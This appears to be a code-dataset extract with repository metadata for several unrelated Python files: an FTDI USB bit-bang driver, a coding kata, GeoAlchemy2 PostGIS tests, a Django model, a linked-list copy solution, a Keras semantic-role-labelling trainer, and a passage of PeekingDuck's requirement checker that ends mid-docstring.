2018-08-24T11:13:29.000Z
|
2018-08-29T00:40:36.000Z
|
src/fixate/drivers/ftdi.py
|
stig999/Fixate
|
24b4a16736c80b28f40aeb52972c52f9654983ef
|
[
"MIT"
] | null | null | null |
import ctypes
import struct
import time
from fixate.core.common import bits
from fixate.core.exceptions import InstrumentError, InstrumentNotConnected
import fixate.config
import fixate.core.discover
def open(ftdi_description=""):
"""Open is the public api for the bit bang driver for discovering and opening a connection
to a valid bit bang device
:param restrictions:
A dictionary containing the extents of the required equipment
:return:
A instantiated class connected to a valid bit_bang class
"""
devices = fixate.core.discover.discover_ftdi()
for dev in devices:
if ftdi_description.encode() == dev.Description or ftdi_description == "":
return FTDI2xx(dev.Description)
raise InstrumentNotConnected("No valid ftdi found by description '{}'".format(ftdi_description))
# Definitions
UCHAR = ctypes.c_ubyte
PCHAR = ctypes.POINTER(ctypes.c_char)
PUCHAR = ctypes.POINTER(ctypes.c_ubyte)
DWORD = ctypes.c_ulong
LPDWORD = ctypes.POINTER(ctypes.c_ulong)
FT_HANDLE = DWORD
class FT_STATUS(object):
FT_OK = DWORD(0)
FT_INVALID_HANDLE = DWORD(1)
FT_DEVICE_NOT_FOUND = DWORD(2)
FT_DEVICE_NOT_OPENED = DWORD(3)
FT_IO_ERROR = DWORD(4)
FT_INSUFFICIENT_RESOURCES = DWORD(5)
FT_INVALID_PARAMETER = DWORD(6)
FT_INVALID_BAUD_RATE = DWORD(7)
FT_DEVICE_NOT_OPENED_FOR_ERASE = DWORD(8)
FT_DEVICE_NOT_OPENED_FOR_WRITE = DWORD(9)
FT_FAILED_TO_WRITE_DEVICE = DWORD(10)
FT_EEPROM_READ_FAILED = DWORD(11)
FT_EEPROM_WRITE_FAILED = DWORD(12)
FT_EEPROM_ERASE_FAILED = DWORD(13)
FT_EEPROM_NOT_PRESENT = DWORD(14)
FT_EEPROM_NOT_PROGRAMMED = DWORD(15)
FT_INVALID_ARGS = DWORD(16)
FT_NOT_SUPPORTED = DWORD(17)
FT_OTHER_ERROR = DWORD(18)
class FT_DEVICE(object):
FT_DEVICE_232BM = DWORD(0)
FT_DEVICE_232AM = DWORD(1)
FT_DEVICE_100AX = DWORD(2)
FT_DEVICE_UNKNOWN = DWORD(3)
FT_DEVICE_2232C = DWORD(4)
FT_DEVICE_232R = DWORD(5)
FT_DEVICE_2232H = DWORD(6)
FT_DEVICE_4232H = DWORD(7)
FT_DEVICE_232H = DWORD(8)
FT_DEVICE_X_SERIES = DWORD(9)
class FLAGS(object):
FT_OPEN_BY_SERIAL_NUMBER = DWORD(1)
FT_OPEN_BY_DESCRIPTION = DWORD(2)
FT_OPEN_BY_LOCATION = DWORD(4)
class BIT_MODE(object):
FT_BITMODE_RESET = DWORD(0x00)
FT_BITMODE_ASYNC_BITBANG = DWORD(0x01)
FT_BITMODE_MPSSE = DWORD(0x02)
FT_BITMODE_SYNC_BITBANG = DWORD(0x04)
FT_BITMODE_MCU_HOST = DWORD(0x08)
FT_BITMODE_FAST_SERIAL = DWORD(0x10)
FT_BITMODE_CBUS_BITBANG = DWORD(0x20)
FT_BITMODE_SYNC_FIFO = DWORD(0x40)
# Add null padding if 64 bit
if struct.calcsize("P") == 8:
class FT_DEVICE_LIST_INFO_NODE(ctypes.Structure):
_fields_ = [("Flags", DWORD),
("Type", DWORD),
("ID", DWORD),
("LocId", DWORD),
("SerialNumber", ctypes.c_char * 16),
("Description", ctypes.c_char * 64),
("ftHandle", DWORD),
("null_padding", DWORD)]
else: # 32 bit
class FT_DEVICE_LIST_INFO_NODE(ctypes.Structure):
_fields_ = [("Flags", DWORD),
("Type", DWORD),
("ID", DWORD),
("LocId", DWORD),
("SerialNumber", ctypes.c_char * 16),
("Description", ctypes.c_char * 64),
("ftHandle", DWORD)]
class WORD_LENGTH(object):
FT_BITS_8 = UCHAR(8)
FT_BITS_7 = UCHAR(7)
class STOP_BITS(object):
FT_STOP_BITS_1 = UCHAR(0)
FT_STOP_BITS_2 = UCHAR(2)
class PARITY(object):
FT_PARITY_NONE = UCHAR(0)
FT_PARITY_ODD = UCHAR(1)
FT_PARITY_EVEN = UCHAR(2)
FT_PARITY_MARK = UCHAR(3)
FT_PARITY_SPACE = UCHAR(4)
try:
ftdI2xx = ctypes.WinDLL("FTD2XX.dll")
except Exception as e:
raise ImportError("Unable to find FTD2XX.dll.\nPlugging in FDTI device will install DLL.") from e
_ipdwNumDevs = DWORD(0)
_p_ipdwNumDevs = LPDWORD(_ipdwNumDevs)
def create_device_info_list():
# FT_CreateDeviceInfoList needs to be called before info can be retrieved
stat = DWORD()
stat.value = ftdI2xx.FT_CreateDeviceInfoList(_p_ipdwNumDevs)
# print(stat)
if stat.value != FT_STATUS.FT_OK.value:
pass
# print(stat)
# print(type(stat))
# print(type(FT_STATUS.FT_OK))
# print(ipdwNumDevs)
def _get_device_info_detail(pDest):
# FT_GetDeviceInfoDetail
stat = DWORD()
dev = pDest[0]
handle = DWORD()
flags = DWORD()
typeid = DWORD()
id = DWORD()
locid = DWORD()
sn = ctypes.create_string_buffer(16)
desc = ctypes.create_string_buffer(64)
stat.value = ftdI2xx.FT_GetDeviceInfoDetail(dev,
flags,
typeid,
id,
locid,
sn,
desc,
ctypes.byref(handle))
if stat.value != FT_STATUS.FT_OK.value:
raise Exception("FT_GetDeviceInfoDetail failed")
# print("flags {}".format(flags))
# print("typeid {}".format(typeid))
# print("id {}".format(id))
# print("locid {}".format(locid))
# print("sn {}".format(sn))
# print("desc {}".format(desc))
# print("handle {}".format(handle))
# FT_GetDeviceInfoList
def get_device_info_list():
stat = DWORD()
pDest = (FT_DEVICE_LIST_INFO_NODE * _ipdwNumDevs.value)()
# for num in range(_ipdwNumDevs.value):
# print(dir(pDest[num]))
# print(pDest[num].Flags)
stat.value = ftdI2xx.FT_GetDeviceInfoList(pDest, ctypes.byref(_ipdwNumDevs))
if stat.value != FT_STATUS.FT_OK.value:
raise Exception("FT_GetDeviceInfoList failed")
# for field in FT_DEVICE_LIST_INFO_NODE._fields_:
# print("{}: {} - {}".format(field[0].upper(), getattr(pDest[0], field[0]), type(getattr(pDest[0], field[0]))))
return pDest
class FTDI2xx(object):
INSTR_TYPE = "FTDI"
def __init__(self, ftdi_description):
"""
:param handle:
handle from device info
:param flag:
FLAGS
FLAGS.FT_OPEN_BY_SERIAL_NUMBER
FLAGS.FT_OPEN_BY_DESCRIPTION
FLAGS.FT_OPEN_BY_LOCATION
:param search_term:
Accompanying search term set by the flag
:return:
"""
self.handle = DWORD()
self.ftdi_description = ftdi_description
self.cmd_status = DWORD()
self._connect()
self._baud_rate = None
self.baud_rate = 9600
self.bit_mode = BIT_MODE.FT_BITMODE_CBUS_BITBANG
self.pin_value_mask = 0b111
self.std_delay = 0.01
self.delay = time.sleep
# Data characteristics
self._word_length = WORD_LENGTH.FT_BITS_8
self._stop_bits = STOP_BITS.FT_STOP_BITS_1
self._parity = PARITY.FT_PARITY_NONE
self._data_characteristics_set = False
self.bb_data = 1 << 0
self.bb_clk = 1 << 1
self.bb_latch = 1 << 2
self.bb_bytes = 1
self.bb_inv_mask = 0
def _connect(self):
self.cmd_status.value = ftdI2xx.FT_OpenEx(ctypes.c_char_p(self.ftdi_description),
FLAGS.FT_OPEN_BY_DESCRIPTION,
ctypes.byref(self.handle))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_OpenEx failed")
def close(self):
self.cmd_status.value = ftdI2xx.FT_Close(self.handle)
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_Close failed {}".format(self.cmd_status.value))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
@property
def word_length(self):
return self._word_length
@word_length.setter
def word_length(self, val):
if str(val) == '8':
self._word_length = WORD_LENGTH.FT_BITS_8
elif str(val) == '7':
self._word_length = WORD_LENGTH.FT_BITS_7
else:
raise ValueError("Word Length must be either 7 or 8")
self._data_characteristics_set = False
@property
def stop_bits(self):
return self._stop_bits
@stop_bits.setter
def stop_bits(self, val):
if str(val) == '1':
self._stop_bits = STOP_BITS.FT_STOP_BITS_1
elif str(val) == '2':
self._stop_bits = STOP_BITS.FT_STOP_BITS_2
else:
raise ValueError("Stop bits must be either 1 or 2")
self._data_characteristics_set = False
@property
def parity(self):
return self._parity
@parity.setter
def parity(self, val):
try:
parity = [itm for itm in PARITY.__dict__ if itm.startswith('FT_PARITY') and val.upper() in itm][0]
except IndexError:
raise ValueError("Invalid parity: Please select from {}".
format(','.join([itm for itm in PARITY.__dict__ if itm.startswith('FT_PARITY')])))
self._parity = getattr(PARITY, parity)
self._data_characteristics_set = False
@property
def baud_rate(self):
return self._baud_rate
@baud_rate.setter
def baud_rate(self, rate):
try:
self.cmd_status.value = ftdI2xx.FT_SetBaudRate(self.handle, DWORD(rate))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_SetBaudRate failed")
self._baud_rate = rate
except:
self._baud_rate = None
raise
def write_bit_mode(self, mask, validate=False):
"""
handle; gained from device info
mask; value to write for the mask
for BIT_MODE.FT_BITMODE_CBUS_BITBANG
upper nibble is input (0) output (1)
lower nibble is pin value low (0) high (1)
bit_mode; Type BIT_MODE
"""
self.cmd_status.value = ftdI2xx.FT_SetBitMode(self.handle, UCHAR(mask), self.bit_mode)
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_SetBitMode failed")
data_bus = UCHAR()
if validate:
self.cmd_status.value = ftdI2xx.FT_GetBitMode(self.handle, ctypes.byref(data_bus))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_GetBitMode failed")
return data_bus.value & self.pin_value_mask == mask & self.pin_value_mask
def get_cbus_pins(self):
try:
self.cmd_status.value = ftdI2xx.FT_SetBitMode(self.handle, UCHAR(0), BIT_MODE.FT_BITMODE_CBUS_BITBANG)
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_SetBitMode failed")
data_bus = UCHAR()
self.cmd_status.value = ftdI2xx.FT_GetBitMode(self.handle, ctypes.byref(data_bus))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_GetBitMode failed")
finally:
self.cmd_status.value = ftdI2xx.FT_SetBitMode(self.handle, UCHAR(self.pin_value_mask), self.bit_mode)
return data_bus.value
# self.write_bit_mode(self.pin_value_mask)
def write(self, data, size=None):
if not self._data_characteristics_set:
self._set_data_characteristics()
if size is None:
size = len(data)
buffer = ctypes.create_string_buffer(bytes(data), size)
bytes_written = DWORD()
self.cmd_status.value = ftdI2xx.FT_Write(self.handle,
buffer,
ctypes.sizeof(buffer),
ctypes.byref(bytes_written))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_Write failed")
def read(self):
buffer = self._read()
return buffer.value
def read_raw(self):
buffer = self._read()
return buffer.raw
def _read(self):
if not self._data_characteristics_set:
self._set_data_characteristics()
amount_in_rx_queue = DWORD()
amount_in_tx_queue = DWORD()
status = DWORD()
self.cmd_status.value = ftdI2xx.FT_GetStatus(self.handle,
ctypes.byref(amount_in_rx_queue),
ctypes.byref(amount_in_tx_queue),
ctypes.byref(status))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_GetStatus failed")
buffer = ctypes.create_string_buffer(amount_in_rx_queue.value)
bytes_read = DWORD()
self.cmd_status.value = ftdI2xx.FT_Read(self.handle,
ctypes.byref(buffer),
amount_in_rx_queue,
ctypes.byref(bytes_read))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_Read failed")
return buffer
def _set_data_characteristics(self):
if not [x for x in [self.word_length, self.stop_bits, self.parity] if x is None]:
self.cmd_status.value = ftdI2xx.FT_SetDataCharacteristics(self.handle,
self.word_length,
self.stop_bits,
self.parity)
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_SetDatCharacteristics failed")
self._data_characteristics_set = True
return
raise ValueError("Please ensure that word length, stop bits and parity are set")
def serial_shift_bit_bang(self, data, bytes_required=None):
bytes_required = bytes_required or self.bb_bytes
if self.bit_mode == BIT_MODE.FT_BITMODE_CBUS_BITBANG:
bit_bang = self._serial_shift_bit_bang(data, bytes_required,
bb_mask=(self.bb_clk + self.bb_data + self.bb_latch) << 4)
for byte in bit_bang:
self.write_bit_mode(byte)
else:
bit_bang = self._serial_shift_bit_bang(data, bytes_required, bb_mask=0)
self.write(bit_bang)
def configure_bit_bang(self, bit_mode, bytes_required, latch_mask=1, clk_mask=2, data_mask=4, invert_mask=0b000):
"""
:param bit_mode:
:param bytes_required:
:param latch_mask: CBUS Pin for latch. 1 Default for Relay Matrix
:param clk_mask: CBUS Pin for clock. 2 Default for Relay Matrix
:param data_mask: CBUS Pin for data. 4 Default for Relay Matrix
:param invert_mask: Mask for inverting. 0b111 For all inverted 0b000 for all non inverted
based on MSB 0b<latch><clock><data> LSB
:return:
"""
self.bb_bytes = bytes_required
self.bit_mode = bit_mode
self.write_bit_mode(self.pin_value_mask)
self.bb_data = data_mask
self.bb_clk = clk_mask
self.bb_latch = latch_mask
self.bb_inv_mask = 0
if (1 << 2) & invert_mask:
self.bb_inv_mask += self.bb_latch
if (1 << 1) & invert_mask:
self.bb_inv_mask += self.bb_clk
if 1 & invert_mask:
self.bb_inv_mask += self.bb_data
def _serial_shift_bit_bang(self, data, bytes_required, bb_mask):
data_out = bytearray()
data_out.append(bb_mask + self.bb_inv_mask)
for b in bits(data, num_bytes=bytes_required):
# Write Data
if b:
data_out.append(bb_mask + self.bb_data ^ self.bb_inv_mask)
# Clock Up
data_out.append(bb_mask + (self.bb_data + self.bb_clk) ^ self.bb_inv_mask)
else:
data_out.append(bb_mask + self.bb_inv_mask)
# Clock Up
data_out.append(bb_mask + self.bb_clk ^ self.bb_inv_mask)
# Latch to output
data_out.append(bb_mask + self.bb_inv_mask)
data_out.append(bb_mask + self.bb_latch ^ self.bb_inv_mask)
data_out.append(bb_mask + self.bb_inv_mask)
return data_out
| 36.679825
| 117
| 0.598589
| 13,227
| 0.790805
| 0
| 0
| 1,786
| 0.10678
| 0
| 0
| 3,005
| 0.17966
|
49dc810a61e2972f79b20f3f39e3b0c03cad34a5
| 552
|
py
|
Python
|
Data Structures/Python/find-the-parity-outier.py
|
KhushMody/Ds-Algo-HacktoberFest
|
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
|
[
"MIT"
] | 12
|
2020-10-04T06:48:29.000Z
|
2021-02-16T17:54:04.000Z
|
Data Structures/Python/find-the-parity-outier.py
|
KhushMody/Ds-Algo-HacktoberFest
|
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
|
[
"MIT"
] | 14
|
2020-10-04T09:09:52.000Z
|
2021-10-16T19:59:23.000Z
|
Data Structures/Python/find-the-parity-outier.py
|
KhushMody/Ds-Algo-HacktoberFest
|
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
|
[
"MIT"
] | 55
|
2020-10-04T03:09:25.000Z
|
2021-10-16T09:00:12.000Z
|
# You are given an array (which will have a length of at least 3, but could be very large) containing integers. The array is either entirely comprised of odd integers or entirely comprised of even integers except for a single integer N. Write a method that takes the array as an argument and returns this "outlier" N.
# Examples
# find_outlier([2, 4, 6, 7]) => 7
# find_outlier([3, 7, 11, 2]) => 2
def find_outlier(integers):
l = list(filter(lambda x: x%2==0, integers))
return list(filter(lambda x: x%2, integers))[0] if len(l) > 1 else l[0]
| 61.333333
| 317
| 0.711957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 394
| 0.713768
|
49dd8d278f7b65614e35a417984b39bb22fa9ca9
| 5,621
|
py
|
Python
|
geoalchemy2/tests/test_functional.py
|
fredj/geoalchemy2
|
9f26714e8d181440ac03d7295d34d615cac11d02
|
[
"MIT"
] | null | null | null |
geoalchemy2/tests/test_functional.py
|
fredj/geoalchemy2
|
9f26714e8d181440ac03d7295d34d615cac11d02
|
[
"MIT"
] | null | null | null |
geoalchemy2/tests/test_functional.py
|
fredj/geoalchemy2
|
9f26714e8d181440ac03d7295d34d615cac11d02
|
[
"MIT"
] | null | null | null |
import unittest
from nose.tools import eq_, ok_, raises
from sqlalchemy import create_engine, MetaData, Column, Integer, func
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from geoalchemy2 import Geometry
from sqlalchemy.exc import DataError, IntegrityError, InternalError
engine = create_engine('postgresql://gis:gis@localhost/gis', echo=True)
metadata = MetaData(engine)
Base = declarative_base(metadata=metadata)
class Lake(Base):
__tablename__ = 'lake'
id = Column(Integer, primary_key=True)
geom = Column(Geometry(geometry_type='LINESTRING', srid=4326))
def __init__(self, geom):
self.geom = geom
session = sessionmaker(bind=engine)()
postgis_version = session.execute(func.postgis_version()).scalar()
if not postgis_version.startswith('2.'):
# With PostGIS 1.x the AddGeometryColumn and DropGeometryColumn
# management functions should be used.
Lake.__table__.c.geom.type.management = True
class IndexTest(unittest.TestCase):
def setUp(self):
metadata.drop_all(checkfirst=True)
metadata.create_all()
def tearDown(self):
session.rollback()
metadata.drop_all()
def test_LakeIndex(self):
""" Make sure the Lake table has an index on the geom column """
from sqlalchemy.engine import reflection
inspector = reflection.Inspector.from_engine(engine)
indices = inspector.get_indexes(Lake.__tablename__)
eq_(len(indices), 1)
index = indices[0]
eq_(index.get('unique'), False)
eq_(index.get('column_names'), [u'geom'])
class InsertionTest(unittest.TestCase):
def setUp(self):
metadata.drop_all(checkfirst=True)
metadata.create_all()
def tearDown(self):
session.rollback()
metadata.drop_all()
@raises(DataError, IntegrityError)
def test_WKT(self):
# With PostGIS 1.5:
# IntegrityError: (IntegrityError) new row for relation "lake" violates
# check constraint "enforce_srid_geom"
#
# With PostGIS 2.0:
# DataError: (DataError) Geometry SRID (0) does not match column SRID
# (4326)
l = Lake('LINESTRING(0 0,1 1)')
session.add(l)
session.flush()
def test_WKTElement(self):
from geoalchemy2 import WKTElement, WKBElement
l = Lake(WKTElement('LINESTRING(0 0,1 1)', srid=4326))
session.add(l)
session.flush()
session.expire(l)
ok_(isinstance(l.geom, WKBElement))
wkt = session.execute(l.geom.ST_AsText()).scalar()
eq_(wkt, 'LINESTRING(0 0,1 1)')
srid = session.execute(l.geom.ST_SRID()).scalar()
eq_(srid, 4326)
class CallFunctionTest(unittest.TestCase):
def setUp(self):
metadata.drop_all(checkfirst=True)
metadata.create_all()
def tearDown(self):
session.rollback()
metadata.drop_all()
def _create_one(self):
from geoalchemy2 import WKTElement
l = Lake(WKTElement('LINESTRING(0 0,1 1)', srid=4326))
session.add(l)
session.flush()
return l.id
def test_ST_GeometryType(self):
from sqlalchemy.sql import select, func
lake_id = self._create_one()
s = select([func.ST_GeometryType(Lake.__table__.c.geom)])
r1 = session.execute(s).scalar()
eq_(r1, 'ST_LineString')
lake = session.query(Lake).get(lake_id)
r2 = session.execute(lake.geom.ST_GeometryType()).scalar()
eq_(r2, 'ST_LineString')
r3 = session.query(Lake.geom.ST_GeometryType()).scalar()
eq_(r3, 'ST_LineString')
r4 = session.query(Lake).filter(
Lake.geom.ST_GeometryType() == 'ST_LineString').one()
ok_(isinstance(r4, Lake))
eq_(r4.id, lake_id)
def test_ST_Buffer(self):
from sqlalchemy.sql import select, func
from geoalchemy2 import WKBElement, WKTElement
lake_id = self._create_one()
s = select([func.ST_Buffer(Lake.__table__.c.geom, 2)])
r1 = session.execute(s).scalar()
ok_(isinstance(r1, WKBElement))
lake = session.query(Lake).get(lake_id)
r2 = session.execute(lake.geom.ST_Buffer(2)).scalar()
ok_(isinstance(r2, WKBElement))
r3 = session.query(Lake.geom.ST_Buffer(2)).scalar()
ok_(isinstance(r3, WKBElement))
ok_(r1.data == r2.data == r3.data)
r4 = session.query(Lake).filter(
func.ST_Within(WKTElement('POINT(0 0)', srid=4326),
Lake.geom.ST_Buffer(2))).one()
ok_(isinstance(r4, Lake))
eq_(r4.id, lake_id)
@raises(InternalError)
def test_ST_Buffer_Mixed_SRID(self):
from sqlalchemy.sql import func
self._create_one()
session.query(Lake).filter(
func.ST_Within('POINT(0 0)',
Lake.geom.ST_Buffer(2))).one()
class ReflectionTest(unittest.TestCase):
def setUp(self):
metadata.drop_all(checkfirst=True)
metadata.create_all()
def tearDown(self):
metadata.drop_all()
def test_reflection(self):
from sqlalchemy import Table
from geoalchemy2 import Geometry
t = Table('lake', MetaData(), autoload=True, autoload_with=engine)
type_ = t.c.geom.type
ok_(isinstance(type_, Geometry))
if not postgis_version.startswith('2.'):
eq_(type_.geometry_type, 'GEOMETRY')
eq_(type_.srid, -1)
else:
eq_(type_.geometry_type, 'LINESTRING')
eq_(type_.srid, 4326)
| 29.898936
| 79
| 0.637609
| 4,827
| 0.858744
| 0
| 0
| 698
| 0.124177
| 0
| 0
| 677
| 0.120441
|
49de3b66d3ba8d7b390aa4f38533368a7826b8e9
| 689
|
py
|
Python
|
WebEmpresarial/social/models.py
|
MarcosKlender/Web_Empresarial
|
79b481488a74415e88898cff029233f339dc1e97
|
[
"BSD-3-Clause"
] | null | null | null |
WebEmpresarial/social/models.py
|
MarcosKlender/Web_Empresarial
|
79b481488a74415e88898cff029233f339dc1e97
|
[
"BSD-3-Clause"
] | null | null | null |
WebEmpresarial/social/models.py
|
MarcosKlender/Web_Empresarial
|
79b481488a74415e88898cff029233f339dc1e97
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db import models
# Create your models here.
class Link(models.Model):
key = models.SlugField(max_length = 100, unique = True, verbose_name = 'Nombre Clave')
name = models.CharField(max_length = 200, verbose_name = 'Red Social')
url = models.URLField(max_length = 200, null = True, blank = True, verbose_name = 'Enlace')
created = models.DateTimeField(auto_now_add = True, verbose_name = 'Fecha de Creación')
updated = models.DateTimeField(auto_now = True, verbose_name = 'Fecha de Edición')
class Meta:
verbose_name = 'enlace'
verbose_name_plural = 'enlaces'
ordering = ['name']
def __str__(self):
return self.name
| 40.529412
| 95
| 0.685051
| 634
| 0.917511
| 0
| 0
| 0
| 0
| 0
| 0
| 122
| 0.176556
|
49df0f9be98b9b2a452a359335aef6fd2e914b5c
| 940
|
py
|
Python
|
p138_copy_list_with_random_pointer.py
|
moonfruit/leetcode
|
796b736d9b7b31f8052df6a0a140e34904b8230c
|
[
"MIT"
] | null | null | null |
p138_copy_list_with_random_pointer.py
|
moonfruit/leetcode
|
796b736d9b7b31f8052df6a0a140e34904b8230c
|
[
"MIT"
] | null | null | null |
p138_copy_list_with_random_pointer.py
|
moonfruit/leetcode
|
796b736d9b7b31f8052df6a0a140e34904b8230c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- utf-8 -*-
# Definition for singly-linked list with a random pointer.
# class RandomListNode:
# def __init__(self, x):
# self.label = x
# self.next = None
# self.random = None
class Solution:
# @param head, a RandomListNode
# @return a RandomListNode
def copyRandomList(self, head):
if head is None:
return None
from copy import copy
old = head
new = ret = copy(head)
save = {None: None, old: new}
while old.next:
old = old.next
save[old] = new.next = copy(old)
new = new.next
new = ret
while new:
new.random = save[new.random]
new = new.next
return ret
if __name__ == '__main__':
from leetcode import RandomListNode
head = RandomListNode.new(1,2,3,4,5,6)
head.print()
Solution().copyRandomList(head).print()
| 22.926829
| 58
| 0.554255
| 537
| 0.571277
| 0
| 0
| 0
| 0
| 0
| 0
| 286
| 0.304255
|
49e017e3c7994fdc80e6366ccb4d6c457be60b26
| 1,904
|
py
|
Python
|
train.py
|
jmnybl/finnish-srl
|
aa53bc5e27e8c9e82bc9827602e448d805b4a960
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
jmnybl/finnish-srl
|
aa53bc5e27e8c9e82bc9827602e448d805b4a960
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
jmnybl/finnish-srl
|
aa53bc5e27e8c9e82bc9827602e448d805b4a960
|
[
"Apache-2.0"
] | null | null | null |
from data_reader import Vocabulary, transform_data, save_vocabularies, Corpus
from model import build_model
from keras.callbacks import ModelCheckpoint
def train(args):
# ARGUMENTS
training_file=args.data
minibatch=64
max_sent_len_words=30
epochs=args.epochs
corpus=Corpus(training_file,test_time=False)
## VOCABULARY
vs=Vocabulary()
vs.build(corpus,min_count_word=args.min_count_word,min_count_sense=args.min_count_sense)
sentences,x,y=transform_data(corpus,vs,max_sent_len_words)
model=build_model(vs,max_sent_len_words)
# save model json
model_json = model.to_json()
with open(args.model_name+".json", "w") as json_file:
json_file.write(model_json)
save_vocabularies(vs,args.model_name+"-vocab.pickle")
# +".{epoch:02d}.h5"
save_cb=ModelCheckpoint(filepath=args.model_name+".h5", monitor='val_loss', verbose=1, save_best_only=True, mode='auto')
model.fit(x,y,batch_size=minibatch,epochs=epochs,verbose=1,validation_split=0.1,callbacks=[save_cb])
if __name__=="__main__":
import argparse
parser = argparse.ArgumentParser(description='')
g=parser.add_argument_group("Reguired arguments")
g.add_argument('-d', '--data', type=str, required=True, help='Training file')
g.add_argument('-m', '--model_name', type=str, required=True, help='Name of the saved model')
g.add_argument('--min_count_word', type=int, default=2, help='Frequency threshold, how many times a word must occur to be included in the vocabulary? (default %(default)d)')
g.add_argument('--min_count_sense', type=int, default=2, help='Frequency threshold, how many times a verb sense must occur to be included in the vocabulary? (default %(default)d)')
g.add_argument('--epochs', type=int, default=10, help='Number of training epochs')
args = parser.parse_args()
train(args)
| 33.403509
| 184
| 0.719538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 511
| 0.268382
|
49e1f87f1d26cc79c1491809b52a416913e40d98
| 6,198
|
py
|
Python
|
peekingduck/utils/requirement_checker.py
|
ericleehy/PeekingDuck
|
8cf1be842235fa60bac13bc466cac09747a780ea
|
[
"Apache-2.0"
] | 1
|
2021-12-02T05:15:58.000Z
|
2021-12-02T05:15:58.000Z
|
peekingduck/utils/requirement_checker.py
|
ericleehy/PeekingDuck
|
8cf1be842235fa60bac13bc466cac09747a780ea
|
[
"Apache-2.0"
] | null | null | null |
peekingduck/utils/requirement_checker.py
|
ericleehy/PeekingDuck
|
8cf1be842235fa60bac13bc466cac09747a780ea
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022 AI Singapore
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Python package requirements checker."""
import collections
import importlib
import logging
import subprocess
import sys
from pathlib import Path
from typing import Any, Iterator, TextIO, Tuple, Union
import pkg_resources as pkg
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
PKD_NODE_PREFIX = "peekingduck.pipeline.nodes."
PKD_REQ_TYPE_LEN = 6 # string length of either PYTHON or SYSTEM
PKD_REQ_TYPE_PYTHON = "PYTHON" # type specifier for Python packages
ROOT = Path(__file__).resolve().parents[1]
OptionalRequirement = collections.namedtuple("OptionalRequirement", "name type")
class RequirementChecker(importlib.abc.MetaPathFinder):
"""Checks for optional requirements from imports.
While inheriting from MetaPathFinder is not strictly necessary, it serves
as a reference for the required interface.
"""
n_update = 0
@staticmethod
def find_spec(fullname: str, *_: Any) -> None:
"""Checks if the peekingduck.pipeline.nodes module being imported
contains optional requirements. Attempt to install if it does.
Args:
fullname (:obj:`str`): Name of the module being imported.
"""
if fullname.startswith(PKD_NODE_PREFIX):
try:
RequirementChecker.n_update += check_requirements(
fullname[len(PKD_NODE_PREFIX) :]
)
except subprocess.CalledProcessError:
sys.exit(1)
def check_requirements(
identifier: str, requirements_path: Path = ROOT / "optional_requirements.txt"
) -> int:
"""Checks if the packages specified by the ``identifier`` in the
requirements file at ``requirements_path`` are present on the system. If
``install`` is ``True``, attempts to install the packages.
Args:
identifier (:obj:`str`): A unique identifier, typically a pipeline node
name, used to specify which packages to check for.
requirements_path (Path): Path to the requirements file
Returns:
(:obj:`int`): The number of packages updated.
"""
with open(requirements_path) as infile:
requirements = list(_parse_requirements(infile, identifier))
n_update = 0
for req in requirements:
if req.type == PKD_REQ_TYPE_PYTHON:
try:
pkg.require(req.name)
except (pkg.DistributionNotFound, pkg.VersionConflict):
logger.info(
f"{req.name} not found and is required, attempting auto-update..."
)
try:
logger.info(
subprocess.check_output(["pip", "install", req.name]).decode()
)
n_update += 1
except subprocess.CalledProcessError as exception:
logger.error(exception)
raise
else:
logger.warning(
f"The {identifier} node requires {req.name.strip()} which needs to be "
"manually installed. Please follow the instructions at "
"https://peekingduck.readthedocs.io/en/stable/master.html#api-documentation "
"and rerun. Ignore this warning if the package is already installed"
)
return n_update
def _parse_requirements(file: TextIO, identifier: str) -> Iterator[OptionalRequirement]:
"""Yield ``OptionalRequirement`` objects for each specification in
``strings``.
``strings`` must be a string, or a (possibly-nested) iterable thereof.
Arg:
file (TextIO): The file object containing optional requirements.
identifier (str): A unique identifier, typically a pipeline node name,
used to specify which packages to check for.
Returns:
(Iterator[OptionalRequirements]): Optional requirements, both Python
and system packages, specified under the unique identifier.
"""
lines = iter(_yield_lines(file, identifier))
for line in lines:
# Drop comments -- a hash without a space may be in a URL.
if " #" in line:
line = line[: line.find(" #")]
req_type, req_name = _split_type_and_name(line)
if req_type == PKD_REQ_TYPE_PYTHON:
req = pkg.Requirement(req_name) # type: ignore
requirement = OptionalRequirement(f"{req.name}{req.specifier}", req_type)
else:
requirement = OptionalRequirement(req_name, req_type)
yield requirement
def _yield_lines(strings: Union[TextIO, str], identifier: str) -> Iterator[str]:
"""Yield lines with ``identifier`` as the prefix.
Args:
strings (Union[TextIO, str]): Either a file object or a line from the
file.
identifier (str): A unique identifier, typically a pipeline node name,
